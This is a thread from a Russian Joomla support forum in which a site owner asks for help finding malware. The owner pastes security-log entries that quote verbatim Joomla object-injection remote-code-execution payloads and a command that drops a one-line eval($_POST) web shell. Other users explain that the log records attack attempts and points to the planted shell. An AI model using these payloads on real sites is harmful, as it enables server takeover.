Форум русской поддержки Joomla!® CMS
04.12.2016, 22:28:14 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Joomla 2.5, вирус

 (Прочитано 196 раз)
0 Пользователей и 1 Гость смотрят эту тему.
Kim_Soal
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 6


« : 05.08.2016, 03:37:35 »

Добрый день.
Пытаюсь обнаружить вирус на сайте (особо ничем не проявляет себя, но в результатах выдачи сайт помечен как с возможным заражением). Вебмастер прислал сообщения с ссылками на страницы, в которых ломаный контент, но данные ничем мне эти не помогли.. с них идет просто переадрес на главную страницу.

Скачал сайт с ftp на локал. Распаковал,  проверил avz и cureit - все число. Ссылок на сторонние ресурсы нигде нет.  Фреймов не нашел. По общей инфе что искать - прошелся. По "eval(base64" нашел только один файлик /logs/jhackguard-log.php - я так понимаю, это лог ошибок, и самого вируса там быть не может?

Несколько  фрагментов:
2016-06-10T07:40:19+00:00   CRITICAL   jhackguard   Changed POST value from:ububv}__vzgcqpzryo|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:71:"eval(base64_decode($_SERVER['HTTP_CNXVS']));JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}ðýýý to:



2016-07-20T01:57:37+00:00   CRITICAL   jhackguard   Changed POST value from:uktdc}__lyqfkcvdcb|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:82:"eval(base64_decode(str_rot13($_SERVER['HTTP_ESOCW'])));JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}ðýýý to:



2016-08-04T04:06:13+00:00   CRITICAL   jhackguard   Changed GET value from:     @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/configurationbak.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; to:    @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/configurationbak.php','PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';


Уже вторые сутки просматриваю в ручную, в php js не силен, крыша едет пока что
Если кто сможет ответить,  или помочь, + к карме Вам обеспечен, можно в виде хороших отзывов где-то
Записан
SmokerMan
Профи
********

Репутация: +692/-25
Offline Offline

Пол: Мужской
Сообщений: 5216



« Ответ #1 : 05.08.2016, 03:48:55 »

а топик не судьба этой ветки прочитать?
то что просканировали антивирусами - это все до жопы
как минимум стоит пройтись айболитом, ну и немного разбираться в php, что бы вылечить сайт полностью
бесплатных консультаций тут увы больше не будет)
Записан
Kim_Soal
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 6


« Ответ #2 : 05.08.2016, 03:54:30 »

да мне бы хотя бы ответ на этот вопрос...
"/logs/jhackguard-log.php - я так понимаю, это лог ошибок, и самого вируса там быть не может?
"
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2651


step by step


« Ответ #3 : 05.08.2016, 08:42:39 »

да мне бы хотя бы ответ на этот вопрос...
"/logs/jhackguard-log.php - я так понимаю, это лог ошибок, и самого вируса там быть не может?
"
Это лог попыток взлома.А кто ставил плагин jhackguard ?
И там же прямое указание на шелл в файле в корне сайта /configurationbak.php
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet